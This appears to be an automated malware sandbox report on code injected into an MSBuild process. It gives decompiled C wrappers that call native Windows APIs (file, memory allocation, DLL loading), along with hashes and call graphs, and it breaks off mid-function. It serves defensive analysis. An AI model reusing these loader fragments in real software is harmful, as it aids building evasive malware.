PostThreadMessageW 35464->35465 35466 408370 35464->35466 35465->35466 35466->35386 35468 40f683 35467->35468 35474 419e90 35468->35474 35472 419d6c 35471->35472 35473 41af60 LdrLoadDll 35471->35473 35472->35394 35473->35472 35475 419eac 35474->35475 35476 41af60 LdrLoadDll 35474->35476 35479 1049840 LdrInitializeThunk 35475->35479 35476->35475 35477 40f6ae 35477->35386 35479->35477 35480->35316 35482 41af60 LdrLoadDll 35481->35482 35483 419fdc 35482->35483 35486 10499a0 LdrInitializeThunk 35483->35486 35484 40f4fe 35484->35322 35484->35323 35486->35484 35487->35328 35488->35333 35489->35338 35490 1049540 LdrInitializeThunk

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                            C-Code - Quality: 37%
                                            			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                            				void* _t18;
                                            				void* _t27;
                                            				intOrPtr* _t28;
                                            
                                            				_t13 = _a4;
                                            				_t28 = _a4 + 0xc48;
                                            				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                            				_t4 =  &_a40; // 0x414a31
                                            				_t6 =  &_a32; // 0x414d72
                                            				_t12 =  &_a8; // 0x414d72
                                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                            				return _t18;
                                            			}






                                            0x0041a413
                                            0x0041a41f
                                            0x0041a427
                                            0x0041a42c
                                            0x0041a432
                                            0x0041a44d
                                            0x0041a455
                                            0x0041a459

                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 216 40acf0-40ad19 call 41cc50 219 40ad1b-40ad1e 216->219 220 40ad1f-40ad2d call 41d070 216->220 223 40ad3d-40ad4e call 41b4a0 220->223 224 40ad2f-40ad3a call 41d2f0 220->224 229 40ad50-40ad64 LdrLoadDll 223->229 230 40ad67-40ad6a 223->230 224->223 229->230
                                            C-Code - Quality: 100%
                                            			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                            				char* _v8;
                                            				struct _EXCEPTION_RECORD _v12;
                                            				struct _OBJDIR_INFORMATION _v16;
                                            				char _v536;
                                            				void* _t15;
                                            				struct _OBJDIR_INFORMATION _t17;
                                            				struct _OBJDIR_INFORMATION _t18;
                                            				void* _t30;
                                            				void* _t31;
                                            				void* _t32;
                                            
                                            				_v8 =  &_v536;
                                            				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                            				_t31 = _t30 + 0xc;
                                            				if(_t15 != 0) {
                                            					_t17 = E0041D070(__eflags, _v8);
                                            					_t32 = _t31 + 4;
                                            					__eflags = _t17;
                                            					if(_t17 != 0) {
                                            						E0041D2F0( &_v12, 0);
                                            						_t32 = _t32 + 8;
                                            					}
                                            					_t18 = E0041B4A0(_v8);
                                            					_v16 = _t18;
                                            					__eflags = _t18;
                                            					if(_t18 == 0) {
                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                            						return _v16;
                                            					}
                                            					return _t18;
                                            				} else {
                                            					return _t15;
                                            				}
                                            			}













                                            0x0040ad0c
                                            0x0040ad0f
                                            0x0040ad14
                                            0x0040ad19
                                            0x0040ad23
                                            0x0040ad28
                                            0x0040ad2b
                                            0x0040ad2d
                                            0x0040ad35
                                            0x0040ad3a
                                            0x0040ad3a
                                            0x0040ad41
                                            0x0040ad49
                                            0x0040ad4c
                                            0x0040ad4e
                                            0x0040ad62
                                            0x00000000
                                            0x0040ad64
                                            0x0040ad6a
                                            0x0040ad1e
                                            0x0040ad1e
                                            0x0040ad1e

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 231 41a360-41a376 232 41a37c-41a3b1 NtCreateFile 231->232 233 41a377 call 41af60 231->233 233->232
                                            C-Code - Quality: 100%
                                            			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                            				long _t21;
                                            				void* _t31;
                                            
                                            				_t3 = _a4 + 0xc40; // 0xc40
                                            				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                            				return _t21;
                                            			}





                                            0x0041a36f
                                            0x0041a377
                                            0x0041a3ad
                                            0x0041a3b1

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 234 41a35c-41a3b1 call 41af60 NtCreateFile
                                            C-Code - Quality: 100%
                                            			E0041A35C(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                            				void* _v1957322415;
                                            				long _t24;
                                            				void* _t34;
                                            
                                            				_t18 = _a4;
                                            				_t6 = _t18 + 0xc40; // 0xc40
                                            				E0041AF60(_t34, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                            				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                            				return _t24;
                                            			}






                                            0x0041a363
                                            0x0041a36f
                                            0x0041a377
                                            0x0041a3ad
                                            0x0041a3b1

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: d5fd802cd099293d90e5be68870130880bb6f6ed2b4100c3cab1e95151a04313
                                            • Instruction ID: 55409e79fc2e87cdf0968eebe0caa966a520e268ff113b4a8c1e9e07595b87bb
                                            • Opcode Fuzzy Hash: d5fd802cd099293d90e5be68870130880bb6f6ed2b4100c3cab1e95151a04313
                                            • Instruction Fuzzy Hash: 4F01B6B2201108AFCB18CF99DC84EEB77A9AF8C754F158248FA1D97281C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 243 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                            C-Code - Quality: 100%
                                            			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t14;
                                            				void* _t21;
                                            
                                            				_t3 = _a4 + 0xc60; // 0xca0
                                            				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t14;
                                            			}





                                            0x0041a54f
                                            0x0041a557
                                            0x0041a579
                                            0x0041a57d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 240 41a53b-41a556 241 41a55c-41a57d NtAllocateVirtualMemory 240->241 242 41a557 call 41af60 240->242 242->241
                                            C-Code - Quality: 44%
                                            			E0041A53B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t14;
                                            				void* _t21;
                                            
                                            				asm("repne pop es");
                                            				asm("insd");
                                            				asm("aaa");
                                            				asm("adc eax, 0x8bec8b55");
                                            				_t10 = _a4;
                                            				_t3 = _t10 + 0xc60; // 0xca0
                                            				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t14;
                                            			}





                                            0x0041a53b
                                            0x0041a53d
                                            0x0041a53e
                                            0x0041a53f
                                            0x0041a543
                                            0x0041a54f
                                            0x0041a557
                                            0x0041a579
                                            0x0041a57d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: bf7953acd6946ffe089385244b191812051a925c36ddffc8886a4cb0abef713a
                                            • Instruction ID: 3f19b4fe07fa76ac8c37c26cef0bfdfe33b4653fa11a24b21d80f346022d125d
                                            • Opcode Fuzzy Hash: bf7953acd6946ffe089385244b191812051a925c36ddffc8886a4cb0abef713a
                                            • Instruction Fuzzy Hash: AFF01CB51041496BCB14DF98DC85CE7B7A9AF88214B15865AF95C97202C234E8558BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 255 41a490-41a4b9 call 41af60 NtClose
                                            C-Code - Quality: 100%
                                            			E0041A490(intOrPtr _a4, void* _a8) {
                                            				long _t8;
                                            				void* _t11;
                                            
                                            				_t5 = _a4;
                                            				_t2 = _t5 + 0x10; // 0x300
                                            				_t3 = _t5 + 0xc50; // 0x40a943
                                            				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                            				_t8 = NtClose(_a8); // executed
                                            				return _t8;
                                            			}





                                            0x0041a493
                                            0x0041a496
                                            0x0041a49f
                                            0x0041a4a7
                                            0x0041a4b5
                                            0x0041a4b9

                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bed87b789fcc86fa34e009be4ee33806e96cb250caca0913ee97bed4a9526e5a
                                            • Instruction ID: a9996617ed2bc7e032d19f5aa99bfa5d1e0c47e3a77cf3a105cd71ea5b93cfd8
                                            • Opcode Fuzzy Hash: bed87b789fcc86fa34e009be4ee33806e96cb250caca0913ee97bed4a9526e5a
                                            • Instruction Fuzzy Hash: 5A9002B120100903D281719984047470509E7D0341F51C012A9454554EC6998DD577A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4843d149a55ac8ebd2b66fb9c91ed6f7c93ed9a8ddbcdc574363b53846aaee28
                                            • Instruction ID: ad903728f4b59f546e07ecbcb321ea2a361a1ecf58550bd7700aa104a3a032a0
                                            • Opcode Fuzzy Hash: 4843d149a55ac8ebd2b66fb9c91ed6f7c93ed9a8ddbcdc574363b53846aaee28
                                            • Instruction Fuzzy Hash: 759002A134100943D24161998414B070509E7E1341F51C016E5454554DC659CC927266
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ea227125cd9164234abbe25fda9796426fb3835b4df0658c68a0bbe1366d8f2a
                                            • Instruction ID: 111259ff4aeb4486f54e3630059a9175893bf369ddaf219a95ee9ee7a1a75e65
                                            • Opcode Fuzzy Hash: ea227125cd9164234abbe25fda9796426fb3835b4df0658c68a0bbe1366d8f2a
                                            • Instruction Fuzzy Hash: 5C900261242046535686B1998404507450AF7E0281791C013A5804950CC5669896E761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d2a8b5c2e90ef72dd70a38e5fdb92a2050f518350fa20a5036effbaa860c05d9
                                            • Instruction ID: c4870aceb10580b82527db402c35155a06e84749842fa64caf9b018721992e06
                                            • Opcode Fuzzy Hash: d2a8b5c2e90ef72dd70a38e5fdb92a2050f518350fa20a5036effbaa860c05d9
                                            • Instruction Fuzzy Hash: 0690027120100913D25261998504707050DE7D0281F91C413A4814558DD6968992B261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: fae225c742d50ddbe17c48a995a348be6c5258fd8a45b46370ad6f37fc38f1eb
                                            • Instruction ID: 77162939d80e68fc4bb0d00ba607e4faa9896eabd9af85f6c4e59ad74540b783
                                            • Opcode Fuzzy Hash: fae225c742d50ddbe17c48a995a348be6c5258fd8a45b46370ad6f37fc38f1eb
                                            • Instruction Fuzzy Hash: CD90026160100A03D24271998404617050EE7D0281F91C023A5414555ECA6589D2B271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 802e078aa877adc431d13ce2a2151c65a19e3acc8b6de5fb495c65869c009393
                                            • Instruction ID: 46bcb9a2b70efff97c33da75a8e67864e249544cfa872abf035df3fae25690ab
                                            • Opcode Fuzzy Hash: 802e078aa877adc431d13ce2a2151c65a19e3acc8b6de5fb495c65869c009393
                                            • Instruction Fuzzy Hash: D090027120140903D2416199881470B0509E7D0342F51C012A5554555DC665889176B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d2a25c4b345ec7420cf083d65e907db135a89977317555c3a039d3193164e98a
                                            • Instruction ID: 1ea01eb064d4e0108b06f441e1dc0d305e33df8561f4d7204b8db4d2a9e4a552
                                            • Opcode Fuzzy Hash: d2a25c4b345ec7420cf083d65e907db135a89977317555c3a039d3193164e98a
                                            • Instruction Fuzzy Hash: 8E90026160100543428171A9C8449074509FBE1251751C122A4D88550DC59988A567A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f37401118b5582621d8ff5d1825819a506c0c5e89921d2eb366b343fe37fa7f2
                                            • Instruction ID: b2b1c2e46fc640cc2fcca51befc484cd0cd4cb86b752fab68226b85ab44cd1f4
                                            • Opcode Fuzzy Hash: f37401118b5582621d8ff5d1825819a506c0c5e89921d2eb366b343fe37fa7f2
                                            • Instruction Fuzzy Hash: 5790026121180543D34165A98C14B070509E7D0343F51C116A4544554CC95588A16661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 738a691d97dff69a5c1bd0f8c95e9c996b5ff97ca4f4ae64559caeead201b26d
                                            • Instruction ID: 6e29a408e34ea78b0872bf13254a83e1ae958582a1335b10015c521f74faeb69
                                            • Opcode Fuzzy Hash: 738a691d97dff69a5c1bd0f8c95e9c996b5ff97ca4f4ae64559caeead201b26d
                                            • Instruction Fuzzy Hash: FF900265211005030246A5994704507054AE7D5391351C022F5405550CD66188A16261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e9f44d84d09055a2a6a7204aae8ac4d6e5fede52d8e59feb5f5fb7b4aaf2853e
                                            • Instruction ID: 0f0a0b8c8e1bbf29406c7425897ddc6f4f86b612adfcb1b6797267ca18eb424c
                                            • Opcode Fuzzy Hash: e9f44d84d09055a2a6a7204aae8ac4d6e5fede52d8e59feb5f5fb7b4aaf2853e
                                            • Instruction Fuzzy Hash: CB9002A120200503424671998414617450EE7E0241B51C022E5404590DC56588D17265
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 36dc1ad7bb9631e3f8ca9721b1f0f3b753f05c44a23af69a34528375787aa053
                                            • Instruction ID: 3a0f7c5beb4d66168110a502dbe93d63e37cf19ab8fe057f109bcb38334c159b
                                            • Opcode Fuzzy Hash: 36dc1ad7bb9631e3f8ca9721b1f0f3b753f05c44a23af69a34528375787aa053
                                            • Instruction Fuzzy Hash: C290027120100903D24165D994086470509E7E0341F51D012A9414555EC6A588D17271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 250742a6c220fabe55a0432ccaac2d98bd7f98d7ed06352d254aea881ce25944
                                            • Instruction ID: 37f50a4ed66da41d77b6398fb7c698bd4ba011e790dd1911208d525c1c161e9b
                                            • Opcode Fuzzy Hash: 250742a6c220fabe55a0432ccaac2d98bd7f98d7ed06352d254aea881ce25944
                                            • Instruction Fuzzy Hash: 4790026921300503D2C17199940860B0509E7D1242F91D416A4405558CC95588A96361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 491d788c7c82ec4cd8a77e81f38e6f200e3f43bef0d3339d251a6225107923ee
                                            • Instruction ID: 227d072092580dffc09bdede7167e5b216828522fb3bdb32b2c8c18cd6a37178
                                            • Opcode Fuzzy Hash: 491d788c7c82ec4cd8a77e81f38e6f200e3f43bef0d3339d251a6225107923ee
                                            • Instruction Fuzzy Hash: AF90026130100503D281719994186074509F7E1341F51D012E4804554CD95588966362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5e811764450a25874605942fac5997d8d1b1461828cd70e368e335338d42345c
                                            • Instruction ID: 8f101b3a1462a376dbe469decf378b4fb9853180ea5209b5cf03fc96f2a82dad
                                            • Opcode Fuzzy Hash: 5e811764450a25874605942fac5997d8d1b1461828cd70e368e335338d42345c
                                            • Instruction Fuzzy Hash: D990027120100D03D2C17199840464B0509E7D1341F91C016A4415654DCA558A9977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2cc235221d13182e80cd2cf86a7f686b70ff405ddaea6c4dfceccabd9e99403d
                                            • Instruction ID: 7102b8c87034efb622dfb6571ffebee7895a79f088bdc972458667b7de9b2009
                                            • Opcode Fuzzy Hash: 2cc235221d13182e80cd2cf86a7f686b70ff405ddaea6c4dfceccabd9e99403d
                                            • Instruction Fuzzy Hash: 0990027120108D03D2516199C40474B0509E7D0341F55C412A8814658DC6D588D17261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00409AB0(intOrPtr* _a4) {
                                            				intOrPtr _v8;
                                            				char _v24;
                                            				char _v284;
                                            				char _v804;
                                            				char _v840;
                                            				void* _t24;
                                            				void* _t31;
                                            				void* _t33;
                                            				void* _t34;
                                            				void* _t39;
                                            				void* _t50;
                                            				intOrPtr* _t52;
                                            				void* _t53;
                                            				void* _t54;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t52 = _a4;
                                            				_t39 = 0; // executed
                                            				_t24 = E00407EA0(_t52,  &_v24); // executed
                                            				_t54 = _t53 + 8;
                                            				if(_t24 != 0) {
                                            					E004080B0( &_v24,  &_v840);
                                            					_t55 = _t54 + 8;
                                            					do {
                                            						E0041BE10( &_v284, 0x104);
                                            						E0041C480( &_v284,  &_v804);
                                            						_t56 = _t55 + 0x10;
